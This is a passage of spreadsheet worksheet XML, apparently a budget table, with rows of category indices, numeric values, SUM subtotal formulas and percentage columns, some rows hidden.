      <c r="F133" s="174"/>
      <c r="G133" s="172"/>
    </row>
    <row r="134" spans="1:7" ht="17.25" customHeight="1">
      <c r="A134" s="128" t="s">
        <v>454</v>
      </c>
      <c r="B134" s="100">
        <v>0</v>
      </c>
      <c r="C134" s="100"/>
      <c r="D134" s="100">
        <v>10</v>
      </c>
      <c r="E134" s="173">
        <v>10</v>
      </c>
      <c r="F134" s="174"/>
      <c r="G134" s="172"/>
    </row>
    <row r="135" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A135" s="128" t="s">
        <v>455</v>
      </c>
      <c r="B135" s="100">
        <f>SUM(B136:B147)</f>
        <v>0</v>
      </c>
      <c r="C135" s="100">
        <f>SUM(C136:C147)</f>
        <v>0</v>
      </c>
      <c r="D135" s="100">
        <f>SUM(D136:D147)</f>
        <v>0</v>
      </c>
      <c r="E135" s="173">
        <f>SUM(E136:E147)</f>
        <v>0</v>
      </c>
      <c r="F135" s="174"/>
      <c r="G135" s="172"/>
    </row>
    <row r="136" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A136" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B136" s="100">
        <v>0</v>
      </c>
      <c r="C136" s="100"/>
      <c r="D136" s="100">
        <v>0</v>
      </c>
      <c r="E136" s="173"/>
      <c r="F136" s="174"/>
      <c r="G136" s="172"/>
    </row>
    <row r="137" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A137" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B137" s="100">
        <v>0</v>
      </c>
      <c r="C137" s="100"/>
      <c r="D137" s="100">
        <v>0</v>
      </c>
      <c r="E137" s="173"/>
      <c r="F137" s="174"/>
      <c r="G137" s="172"/>
    </row>
    <row r="138" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A138" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B138" s="100">
        <v>0</v>
      </c>
      <c r="C138" s="100"/>
      <c r="D138" s="100">
        <v>0</v>
      </c>
      <c r="E138" s="173"/>
      <c r="F138" s="174"/>
      <c r="G138" s="172"/>
    </row>
    <row r="139" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A139" s="128" t="s">
        <v>456</v>
      </c>
      <c r="B139" s="100">
        <v>0</v>
      </c>
      <c r="C139" s="100"/>
      <c r="D139" s="100">
        <v>0</v>
      </c>
      <c r="E139" s="173"/>
      <c r="F139" s="174"/>
      <c r="G139" s="172"/>
    </row>
    <row r="140" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A140" s="128" t="s">
        <v>457</v>
      </c>
      <c r="B140" s="100">
        <v>0</v>
      </c>
      <c r="C140" s="100"/>
      <c r="D140" s="100">
        <v>0</v>
      </c>
      <c r="E140" s="173"/>
      <c r="F140" s="174"/>
      <c r="G140" s="172"/>
    </row>
    <row r="141" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A141" s="128" t="s">
        <v>458</v>
      </c>
      <c r="B141" s="100">
        <v>0</v>
      </c>
      <c r="C141" s="100"/>
      <c r="D141" s="100">
        <v>0</v>
      </c>
      <c r="E141" s="173"/>
      <c r="F141" s="174"/>
      <c r="G141" s="172"/>
    </row>
    <row r="142" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A142" s="128" t="s">
        <v>459</v>
      </c>
      <c r="B142" s="100">
        <v>0</v>
      </c>
      <c r="C142" s="100"/>
      <c r="D142" s="100">
        <v>0</v>
      </c>
      <c r="E142" s="173"/>
      <c r="F142" s="174"/>
      <c r="G142" s="172"/>
    </row>
    <row r="143" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A143" s="128" t="s">
        <v>460</v>
      </c>
      <c r="B143" s="100">
        <v>0</v>
      </c>
      <c r="C143" s="100"/>
      <c r="D143" s="100">
        <v>0</v>
      </c>
      <c r="E143" s="173"/>
      <c r="F143" s="174"/>
      <c r="G143" s="172"/>
    </row>
    <row r="144" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A144" s="128" t="s">
        <v>461</v>
      </c>
      <c r="B144" s="100">
        <v>0</v>
      </c>
      <c r="C144" s="100"/>
      <c r="D144" s="100">
        <v>0</v>
      </c>
      <c r="E144" s="173"/>
      <c r="F144" s="174"/>
      <c r="G144" s="172"/>
    </row>
    <row r="145" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A145" s="128" t="s">
        <v>462</v>
      </c>
      <c r="B145" s="100">
        <v>0</v>
      </c>
      <c r="C145" s="100"/>
      <c r="D145" s="100">
        <v>0</v>
      </c>
      <c r="E145" s="173"/>
      <c r="F145" s="174"/>
      <c r="G145" s="172"/>
    </row>
    <row r="146" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A146" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B146" s="100">
        <v>0</v>
      </c>
      <c r="C146" s="100"/>
      <c r="D146" s="100">
        <v>0</v>
      </c>
      <c r="E146" s="173"/>
      <c r="F146" s="174"/>
      <c r="G146" s="172"/>
    </row>
    <row r="147" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A147" s="128" t="s">
        <v>463</v>
      </c>
      <c r="B147" s="100">
        <v>0</v>
      </c>
      <c r="C147" s="100"/>
      <c r="D147" s="100">
        <v>0</v>
      </c>
      <c r="E147" s="173"/>
      <c r="F147" s="174"/>
      <c r="G147" s="172"/>
    </row>
    <row r="148" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A148" s="128" t="s">
        <v>464</v>
      </c>
      <c r="B148" s="100">
        <f>SUM(B149:B154)</f>
        <v>0</v>
      </c>
      <c r="C148" s="100">
        <f>SUM(C149:C154)</f>
        <v>0</v>
      </c>
      <c r="D148" s="100">
        <f>SUM(D149:D154)</f>
        <v>0</v>
      </c>
      <c r="E148" s="173">
        <f>SUM(E149:E154)</f>
        <v>0</v>
      </c>
      <c r="F148" s="174"/>
      <c r="G148" s="172"/>
    </row>
    <row r="149" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A149" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B149" s="100"/>
      <c r="C149" s="100"/>
      <c r="D149" s="100">
        <v>0</v>
      </c>
      <c r="E149" s="173"/>
      <c r="F149" s="174"/>
      <c r="G149" s="172"/>
    </row>
    <row r="150" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A150" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B150" s="100">
        <v>0</v>
      </c>
      <c r="C150" s="100"/>
      <c r="D150" s="100">
        <v>0</v>
      </c>
      <c r="E150" s="173"/>
      <c r="F150" s="174"/>
      <c r="G150" s="172"/>
    </row>
    <row r="151" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A151" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B151" s="100">
        <v>0</v>
      </c>
      <c r="C151" s="100"/>
      <c r="D151" s="100">
        <v>0</v>
      </c>
      <c r="E151" s="173"/>
      <c r="F151" s="174"/>
      <c r="G151" s="172"/>
    </row>
    <row r="152" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A152" s="128" t="s">
        <v>465</v>
      </c>
      <c r="B152" s="100">
        <v>0</v>
      </c>
      <c r="C152" s="100"/>
      <c r="D152" s="100">
        <v>0</v>
      </c>
      <c r="E152" s="173"/>
      <c r="F152" s="174"/>
      <c r="G152" s="172"/>
    </row>
    <row r="153" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A153" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B153" s="100">
        <v>0</v>
      </c>
      <c r="C153" s="100"/>
      <c r="D153" s="100">
        <v>0</v>
      </c>
      <c r="E153" s="173"/>
      <c r="F153" s="174"/>
      <c r="G153" s="172"/>
    </row>
    <row r="154" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A154" s="128" t="s">
        <v>466</v>
      </c>
      <c r="B154" s="100">
        <v>0</v>
      </c>
      <c r="C154" s="100"/>
      <c r="D154" s="100">
        <v>0</v>
      </c>
      <c r="E154" s="173"/>
      <c r="F154" s="174"/>
      <c r="G154" s="172"/>
    </row>
    <row r="155" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A155" s="128" t="s">
        <v>467</v>
      </c>
      <c r="B155" s="100">
        <f>SUM(B156:B162)</f>
        <v>0</v>
      </c>
      <c r="C155" s="100">
        <f>SUM(C156:C162)</f>
        <v>0</v>
      </c>
      <c r="D155" s="100">
        <f>SUM(D156:D162)</f>
        <v>0</v>
      </c>
      <c r="E155" s="173">
        <f>SUM(E156:E162)</f>
        <v>0</v>
      </c>
      <c r="F155" s="174"/>
      <c r="G155" s="172"/>
    </row>
    <row r="156" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A156" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B156" s="100"/>
      <c r="C156" s="100"/>
      <c r="D156" s="100">
        <v>0</v>
      </c>
      <c r="E156" s="173"/>
      <c r="F156" s="174"/>
      <c r="G156" s="172"/>
    </row>
    <row r="157" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A157" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B157" s="100">
        <v>0</v>
      </c>
      <c r="C157" s="100"/>
      <c r="D157" s="100">
        <v>0</v>
      </c>
      <c r="E157" s="173"/>
      <c r="F157" s="174"/>
      <c r="G157" s="172"/>
    </row>
    <row r="158" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A158" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B158" s="100">
        <v>0</v>
      </c>
      <c r="C158" s="100"/>
      <c r="D158" s="100">
        <v>0</v>
      </c>
      <c r="E158" s="173"/>
      <c r="F158" s="174"/>
      <c r="G158" s="172"/>
    </row>
    <row r="159" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A159" s="128" t="s">
        <v>468</v>
      </c>
      <c r="B159" s="100">
        <v>0</v>
      </c>
      <c r="C159" s="100"/>
      <c r="D159" s="100">
        <v>0</v>
      </c>
      <c r="E159" s="173"/>
      <c r="F159" s="174"/>
      <c r="G159" s="172"/>
    </row>
    <row r="160" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A160" s="128" t="s">
        <v>469</v>
      </c>
      <c r="B160" s="100"/>
      <c r="C160" s="100"/>
      <c r="D160" s="100">
        <v>0</v>
      </c>
      <c r="E160" s="173"/>
      <c r="F160" s="174"/>
      <c r="G160" s="172"/>
    </row>
    <row r="161" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A161" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B161" s="100">
        <v>0</v>
      </c>
      <c r="C161" s="100"/>
      <c r="D161" s="100">
        <v>0</v>
      </c>
      <c r="E161" s="173"/>
      <c r="F161" s="174"/>
      <c r="G161" s="172"/>
    </row>
    <row r="162" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A162" s="128" t="s">
        <v>470</v>
      </c>
      <c r="B162" s="100">
        <v>0</v>
      </c>
      <c r="C162" s="100"/>
      <c r="D162" s="100">
        <v>0</v>
      </c>
      <c r="E162" s="173"/>
      <c r="F162" s="174"/>
      <c r="G162" s="172"/>
    </row>
    <row r="163" spans="1:7" ht="17.25" customHeight="1">
      <c r="A163" s="128" t="s">
        <v>471</v>
      </c>
      <c r="B163" s="100">
        <f>SUM(B164:B168)</f>
        <v>149</v>
      </c>
      <c r="C163" s="100">
        <f>SUM(C164:C168)</f>
        <v>149</v>
      </c>
      <c r="D163" s="100">
        <f>SUM(D164:D168)</f>
        <v>346</v>
      </c>
      <c r="E163" s="173">
        <f>SUM(E164:E168)</f>
        <v>346</v>
      </c>
      <c r="F163" s="174">
        <f aca="true" t="shared" si="10" ref="F163:F171">E163/C163*100</f>
        <v>232.21476510067114</v>
      </c>
      <c r="G163" s="172"/>
    </row>
    <row r="164" spans="1:7" ht="17.25" customHeight="1">
      <c r="A164" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B164" s="100">
        <v>99</v>
      </c>
      <c r="C164" s="100">
        <v>99</v>
      </c>
      <c r="D164" s="100">
        <v>114</v>
      </c>
      <c r="E164" s="173">
        <v>114</v>
      </c>
      <c r="F164" s="174">
        <f t="shared" si="10"/>
        <v>115.15151515151516</v>
      </c>
      <c r="G164" s="172"/>
    </row>
    <row r="165" spans="1:7" ht="17.25" customHeight="1">
      <c r="A165" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B165" s="100">
        <v>0</v>
      </c>
      <c r="C165" s="100"/>
      <c r="D165" s="100">
        <v>0</v>
      </c>
      <c r="E165" s="173"/>
      <c r="F165" s="174"/>
      <c r="G165" s="172"/>
    </row>
    <row r="166" spans="1:7" ht="17.25" customHeight="1">
      <c r="A166" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B166" s="100">
        <v>0</v>
      </c>
      <c r="C166" s="100"/>
      <c r="D166" s="100">
        <v>0</v>
      </c>
      <c r="E166" s="173"/>
      <c r="F166" s="174"/>
      <c r="G166" s="172"/>
    </row>
    <row r="167" spans="1:7" ht="17.25" customHeight="1">
      <c r="A167" s="128" t="s">
        <v>472</v>
      </c>
      <c r="B167" s="100">
        <v>0</v>
      </c>
      <c r="C167" s="100"/>
      <c r="D167" s="100">
        <v>232</v>
      </c>
      <c r="E167" s="173">
        <v>232</v>
      </c>
      <c r="F167" s="174"/>
      <c r="G167" s="172"/>
    </row>
    <row r="168" spans="1:7" ht="17.25" customHeight="1">
      <c r="A168" s="128" t="s">
        <v>473</v>
      </c>
      <c r="B168" s="100">
        <v>50</v>
      </c>
      <c r="C168" s="100">
        <v>50</v>
      </c>
      <c r="D168" s="100">
        <v>0</v>
      </c>
      <c r="E168" s="173"/>
      <c r="F168" s="174">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="G168" s="172"/>
    </row>
    <row r="169" spans="1:7" ht="17.25" customHeight="1">
      <c r="A169" s="128" t="s">
        <v>474</v>
      </c>
      <c r="B169" s="100">
        <f>SUM(B170:B175)</f>
        <v>84</v>
      </c>
      <c r="C169" s="100">
        <f>SUM(C170:C175)</f>
        <v>84</v>
      </c>
      <c r="D169" s="100">
        <f>SUM(D170:D175)</f>
        <v>105</v>
      </c>
      <c r="E169" s="173">
        <f>SUM(E170:E175)</f>
        <v>105</v>
      </c>
      <c r="F169" s="174">
        <f t="shared" si="10"/>
        <v>125</v>
      </c>
      <c r="G169" s="172"/>
    </row>
    <row r="170" spans="1:7" ht="17.25" customHeight="1">
      <c r="A170" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B170" s="100">
        <v>69</v>
      </c>
      <c r="C170" s="100">
        <v>69</v>
      </c>
      <c r="D170" s="100">
        <v>85</v>
      </c>
      <c r="E170" s="173">
        <v>85</v>
      </c>
      <c r="F170" s="174">
        <f t="shared" si="10"/>
        <v>123.18840579710144</v>
      </c>
      <c r="G170" s="172"/>
    </row>
    <row r="171" spans="1:7" ht="17.25" customHeight="1">
      <c r="A171" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B171" s="100">
        <v>15</v>
      </c>
      <c r="C171" s="100">
        <v>15</v>
      </c>
      <c r="D171" s="100">
        <v>20</v>
      </c>
      <c r="E171" s="173">
        <v>20</v>
      </c>
      <c r="F171" s="174">
        <f t="shared" si="10"/>
        <v>133.33333333333331</v>
      </c>
      <c r="G171" s="172"/>
    </row>
    <row r="172" spans="1:7" ht="17.25" customHeight="1">
      <c r="A172" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B172" s="100">
        <v>0</v>
      </c>
      <c r="C172" s="100"/>
      <c r="D172" s="100">
        <v>0</v>
      </c>
      <c r="E172" s="173"/>
      <c r="F172" s="174"/>
      <c r="G172" s="172"/>
    </row>
    <row r="173" spans="1:7" ht="17.25" customHeight="1">
      <c r="A173" s="128" t="s">
        <v>386</v>
      </c>
      <c r="B173" s="100">
        <v>0</v>
      </c>
      <c r="C173" s="100"/>
      <c r="D173" s="100">
        <v>0</v>
      </c>
      <c r="E173" s="173"/>
      <c r="F173" s="174"/>
      <c r="G173" s="172"/>
    </row>
    <row r="174" spans="1:7" ht="17.25" customHeight="1">
      <c r="A174" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B174" s="100">
        <v>0</v>
      </c>
      <c r="C174" s="100"/>
      <c r="D174" s="100">
        <v>0</v>
      </c>
      <c r="E174" s="173"/>
      <c r="F174" s="174"/>
      <c r="G174" s="172"/>
    </row>
    <row r="175" spans="1:7" ht="17.25" customHeight="1">
      <c r="A175" s="128" t="s">
        <v>475</v>
      </c>
      <c r="B175" s="100">
        <v>0</v>
      </c>
      <c r="C175" s="100"/>
      <c r="D175" s="100">
        <v>0</v>
      </c>
      <c r="E175" s="173"/>
      <c r="F175" s="174"/>
      <c r="G175" s="172"/>
    </row>
    <row r="176" spans="1:7" ht="17.25" customHeight="1">
      <c r="A176" s="128" t="s">
        <v>476</v>
      </c>
      <c r="B176" s="100">
        <f>SUM(B177:B182)</f>
        <v>1347</v>
      </c>
      <c r="C176" s="100">
        <f>SUM(C177:C182)</f>
        <v>1050</v>
      </c>
      <c r="D176" s="100">
        <f>SUM(D177:D182)</f>
        <v>1336</v>
      </c>
      <c r="E176" s="173">
        <f>SUM(E177:E182)</f>
        <v>1336</v>
      </c>
      <c r="F176" s="174">
        <f aca="true" t="shared" si="11" ref="F176:F178">E176/C176*100</f>
        <v>127.23809523809524</v>
      </c>
      <c r="G176" s="172"/>
    </row>
    <row r="177" spans="1:7" ht="17.25" customHeight="1">
      <c r="A177" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B177" s="100">
        <v>180</v>
      </c>
      <c r="C177" s="100">
        <v>180</v>
      </c>
      <c r="D177" s="100">
        <v>266</v>
      </c>
      <c r="E177" s="173">
        <v>266</v>
      </c>
      <c r="F177" s="174">
        <f t="shared" si="11"/>
        <v>147.77777777777777</v>
      </c>
      <c r="G177" s="172"/>
    </row>
    <row r="178" spans="1:7" ht="17.25" customHeight="1">
      <c r="A178" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B178" s="100">
        <v>107</v>
      </c>
      <c r="C178" s="100">
        <v>100</v>
      </c>
      <c r="D178" s="100">
        <v>200</v>
      </c>
      <c r="E178" s="173">
        <v>200</v>
      </c>
      <c r="F178" s="174">
        <f t="shared" si="11"/>
        <v>200</v>
      </c>
      <c r="G178" s="172"/>
    </row>
    <row r="179" spans="1:7" ht="17.25" customHeight="1">
      <c r="A179" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B179" s="100">
        <v>0</v>
      </c>
      <c r="C179" s="100"/>
      <c r="D179" s="100">
        <v>0</v>
      </c>
      <c r="E179" s="173"/>
      <c r="F179" s="174"/>
      <c r="G179" s="172"/>
    </row>
    <row r="180" spans="1:7" ht="17.25" customHeight="1">
      <c r="A180" s="128" t="s">
        <v>477</v>
      </c>
      <c r="B180" s="100">
        <v>0</v>
      </c>
      <c r="C180" s="100"/>
      <c r="D180" s="100">
        <v>870</v>
      </c>
      <c r="E180" s="173">
        <v>870</v>
      </c>
      <c r="F180" s="174"/>
      <c r="G180" s="172"/>
    </row>
    <row r="181" spans="1:7" ht="17.25" customHeight="1">
      <c r="A181" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B181" s="100">
        <v>0</v>
      </c>
      <c r="C181" s="100"/>
      <c r="D181" s="100">
        <v>0</v>
      </c>
      <c r="E181" s="173"/>
      <c r="F181" s="174"/>
      <c r="G181" s="172"/>
    </row>
    <row r="182" spans="1:7" ht="17.25" customHeight="1">
      <c r="A182" s="128" t="s">
        <v>478</v>
      </c>
      <c r="B182" s="100">
        <v>1060</v>
      </c>
      <c r="C182" s="100">
        <v>770</v>
      </c>
      <c r="D182" s="100">
        <v>0</v>
      </c>
      <c r="E182" s="173"/>
      <c r="F182" s="174">
        <f aca="true" t="shared" si="12" ref="F182:F185">E182/C182*100</f>
        <v>0</v>
      </c>
      <c r="G182" s="172"/>
    </row>
    <row r="183" spans="1:7" ht="17.25" customHeight="1">
      <c r="A183" s="128" t="s">
        <v>479</v>
      </c>
      <c r="B183" s="100">
        <f>SUM(B184:B189)</f>
        <v>4374</v>
      </c>
      <c r="C183" s="100">
        <f>SUM(C184:C189)</f>
        <v>4374</v>
      </c>
      <c r="D183" s="100">
        <f>SUM(D184:D189)</f>
        <v>4696</v>
      </c>
      <c r="E183" s="173">
        <f>SUM(E184:E189)</f>
        <v>4552</v>
      </c>
      <c r="F183" s="174">
        <f t="shared" si="12"/>
        <v>104.06950160036578</v>
      </c>
      <c r="G183" s="172"/>
    </row>
    <row r="184" spans="1:7" ht="17.25" customHeight="1">
      <c r="A184" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B184" s="100">
        <v>1846</v>
      </c>
      <c r="C184" s="100">
        <v>1846</v>
      </c>
      <c r="D184" s="100">
        <v>1924</v>
      </c>
      <c r="E184" s="173">
        <v>1924</v>
      </c>
      <c r="F184" s="174">
        <f t="shared" si="12"/>
        <v>104.22535211267605</v>
      </c>
      <c r="G184" s="172"/>
    </row>
    <row r="185" spans="1:7" ht="17.25" customHeight="1">
      <c r="A185" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B185" s="100">
        <v>1304</v>
      </c>
      <c r="C185" s="100">
        <v>1304</v>
      </c>
      <c r="D185" s="100">
        <v>1346</v>
      </c>
      <c r="E185" s="173">
        <v>1202</v>
      </c>
      <c r="F185" s="174">
        <f t="shared" si="12"/>
        <v>92.17791411042946</v>
      </c>
      <c r="G185" s="172"/>
    </row>
    <row r="186" spans="1:7" ht="17.25" customHeight="1">
      <c r="A186" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B186" s="100">
        <v>0</v>
      </c>
      <c r="C186" s="100"/>
      <c r="D186" s="100">
        <v>0</v>
      </c>
      <c r="E186" s="173"/>
      <c r="F186" s="174"/>
      <c r="G186" s="172"/>
    </row>
    <row r="187" spans="1:7" ht="17.25" customHeight="1">
      <c r="A187" s="128" t="s">
        <v>480</v>
      </c>
      <c r="B187" s="100">
        <v>0</v>
      </c>
      <c r="C187" s="100"/>
      <c r="D187" s="100">
        <v>0</v>
      </c>
      <c r="E187" s="173"/>
      <c r="F187" s="174"/>
      <c r="G187" s="172"/>
    </row>
    <row r="188" spans="1:7" ht="17.25" customHeight="1">
      <c r="A188" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B188" s="100">
        <v>224</v>
      </c>
      <c r="C188" s="100">
        <v>224</v>
      </c>
      <c r="D188" s="100">
        <v>647</v>
      </c>
      <c r="E188" s="173">
        <v>647</v>
      </c>
      <c r="F188" s="174">
        <f aca="true" t="shared" si="13" ref="F188:F192">E188/C188*100</f>
        <v>288.8392857142857</v>
      </c>
      <c r="G188" s="172"/>
    </row>
    <row r="189" spans="1:7" ht="17.25" customHeight="1">
      <c r="A189" s="128" t="s">
        <v>481</v>
      </c>
      <c r="B189" s="100">
        <f>392+608</f>
        <v>1000</v>
      </c>
      <c r="C189" s="100">
        <f>392+608</f>
        <v>1000</v>
      </c>
      <c r="D189" s="100">
        <v>779</v>
      </c>
      <c r="E189" s="173">
        <v>779</v>
      </c>
      <c r="F189" s="174">
        <f t="shared" si="13"/>
        <v>77.9</v>
      </c>
      <c r="G189" s="172"/>
    </row>
    <row r="190" spans="1:7" ht="17.25" customHeight="1">
      <c r="A190" s="128" t="s">
        <v>482</v>
      </c>
      <c r="B190" s="100">
        <f>SUM(B191:B196)</f>
        <v>2504</v>
      </c>
      <c r="C190" s="100">
        <f>SUM(C191:C196)</f>
        <v>2503</v>
      </c>
      <c r="D190" s="100">
        <f>SUM(D191:D196)</f>
        <v>2625</v>
      </c>
      <c r="E190" s="173">
        <f>SUM(E191:E196)</f>
        <v>2624</v>
      </c>
      <c r="F190" s="174">
        <f t="shared" si="13"/>
        <v>104.8341989612465</v>
      </c>
      <c r="G190" s="172"/>
    </row>
    <row r="191" spans="1:7" ht="17.25" customHeight="1">
      <c r="A191" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B191" s="100">
        <v>566</v>
      </c>
      <c r="C191" s="100">
        <v>566</v>
      </c>
      <c r="D191" s="100">
        <v>635</v>
      </c>
      <c r="E191" s="173">
        <v>635</v>
      </c>
      <c r="F191" s="174">
        <f t="shared" si="13"/>
        <v>112.19081272084806</v>
      </c>
      <c r="G191" s="172"/>
    </row>
    <row r="192" spans="1:7" ht="17.25" customHeight="1">
      <c r="A192" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B192" s="100">
        <f>1247+690</f>
        <v>1937</v>
      </c>
      <c r="C192" s="100">
        <f>1247+690</f>
        <v>1937</v>
      </c>
      <c r="D192" s="100">
        <v>1852</v>
      </c>
      <c r="E192" s="173">
        <v>1852</v>
      </c>
      <c r="F192" s="174">
        <f t="shared" si="13"/>
        <v>95.61177077955601</v>
      </c>
      <c r="G192" s="172"/>
    </row>
    <row r="193" spans="1:7" ht="17.25" customHeight="1">
      <c r="A193" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B193" s="100">
        <v>0</v>
      </c>
      <c r="C193" s="100"/>
      <c r="D193" s="100">
        <v>0</v>
      </c>
      <c r="E193" s="173"/>
      <c r="F193" s="174"/>
      <c r="G193" s="172"/>
    </row>
    <row r="194" spans="1:7" ht="17.25" customHeight="1">
      <c r="A194" s="128" t="s">
        <v>483</v>
      </c>
      <c r="B194" s="100">
        <v>0</v>
      </c>
      <c r="C194" s="100"/>
      <c r="D194" s="100">
        <v>0</v>
      </c>
      <c r="E194" s="173"/>
      <c r="F194" s="174"/>
      <c r="G194" s="172"/>
    </row>
    <row r="195" spans="1:7" ht="17.25" customHeight="1">
      <c r="A195" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B195" s="100">
        <v>0</v>
      </c>
      <c r="C195" s="100"/>
      <c r="D195" s="100">
        <v>0</v>
      </c>
      <c r="E195" s="173"/>
      <c r="F195" s="174"/>
      <c r="G195" s="172"/>
    </row>
    <row r="196" spans="1:7" ht="17.25" customHeight="1">
      <c r="A196" s="128" t="s">
        <v>484</v>
      </c>
      <c r="B196" s="100">
        <v>1</v>
      </c>
      <c r="C196" s="100"/>
      <c r="D196" s="100">
        <v>138</v>
      </c>
      <c r="E196" s="173">
        <v>137</v>
      </c>
      <c r="F196" s="174"/>
      <c r="G196" s="172"/>
    </row>
    <row r="197" spans="1:7" ht="17.25" customHeight="1">
      <c r="A197" s="128" t="s">
        <v>485</v>
      </c>
      <c r="B197" s="100">
        <f>SUM(B198:B203)</f>
        <v>4542</v>
      </c>
      <c r="C197" s="100">
        <f>SUM(C198:C203)</f>
        <v>4542</v>
      </c>
      <c r="D197" s="100">
        <f>SUM(D198:D203)</f>
        <v>5027</v>
      </c>
      <c r="E197" s="173">
        <f>SUM(E198:E203)</f>
        <v>5027</v>
      </c>
      <c r="F197" s="174">
        <f aca="true" t="shared" si="14" ref="F197:F199">E197/C197*100</f>
        <v>110.67811536767944</v>
      </c>
      <c r="G197" s="172"/>
    </row>
    <row r="198" spans="1:7" ht="17.25" customHeight="1">
      <c r="A198" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B198" s="100">
        <v>241</v>
      </c>
      <c r="C198" s="100">
        <v>241</v>
      </c>
      <c r="D198" s="100">
        <v>427</v>
      </c>
      <c r="E198" s="173">
        <v>427</v>
      </c>
      <c r="F198" s="174">
        <f t="shared" si="14"/>
        <v>177.1784232365145</v>
      </c>
      <c r="G198" s="172"/>
    </row>
    <row r="199" spans="1:7" ht="17.25" customHeight="1">
      <c r="A199" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B199" s="100">
        <v>214</v>
      </c>
      <c r="C199" s="100">
        <v>214</v>
      </c>
      <c r="D199" s="100">
        <v>90</v>
      </c>
      <c r="E199" s="173">
        <v>90</v>
      </c>
      <c r="F199" s="174">
        <f t="shared" si="14"/>
        <v>42.05607476635514</v>
      </c>
      <c r="G199" s="172"/>
    </row>
    <row r="200" spans="1:7" ht="17.25" customHeight="1">
      <c r="A200" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B200" s="100">
        <v>0</v>
      </c>
      <c r="C200" s="100"/>
      <c r="D200" s="100">
        <v>84</v>
      </c>
      <c r="E200" s="173">
        <v>84</v>
      </c>
      <c r="F200" s="174"/>
      <c r="G200" s="172"/>
    </row>
    <row r="201" spans="1:7" ht="17.25" customHeight="1">
      <c r="A201" s="128" t="s">
        <v>486</v>
      </c>
      <c r="B201" s="100"/>
      <c r="C201" s="100"/>
      <c r="D201" s="100">
        <v>0</v>
      </c>
      <c r="E201" s="173"/>
      <c r="F201" s="174"/>
      <c r="G201" s="172"/>
    </row>
    <row r="202" spans="1:7" ht="17.25" customHeight="1">
      <c r="A202" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B202" s="100">
        <v>257</v>
      </c>
      <c r="C202" s="100">
        <v>257</v>
      </c>
      <c r="D202" s="100">
        <v>138</v>
      </c>
      <c r="E202" s="173">
        <v>138</v>
      </c>
      <c r="F202" s="174">
        <f aca="true" t="shared" si="15" ref="F202:F206">E202/C202*100</f>
        <v>53.69649805447471</v>
      </c>
      <c r="G202" s="172"/>
    </row>
    <row r="203" spans="1:7" ht="17.25" customHeight="1">
      <c r="A203" s="128" t="s">
        <v>487</v>
      </c>
      <c r="B203" s="100">
        <f>330+3500</f>
        <v>3830</v>
      </c>
      <c r="C203" s="100">
        <f>330+3500</f>
        <v>3830</v>
      </c>
      <c r="D203" s="100">
        <v>4288</v>
      </c>
      <c r="E203" s="173">
        <v>4288</v>
      </c>
      <c r="F203" s="174">
        <f t="shared" si="15"/>
        <v>111.95822454308093</v>
      </c>
      <c r="G203" s="172"/>
    </row>
    <row r="204" spans="1:7" ht="17.25" customHeight="1">
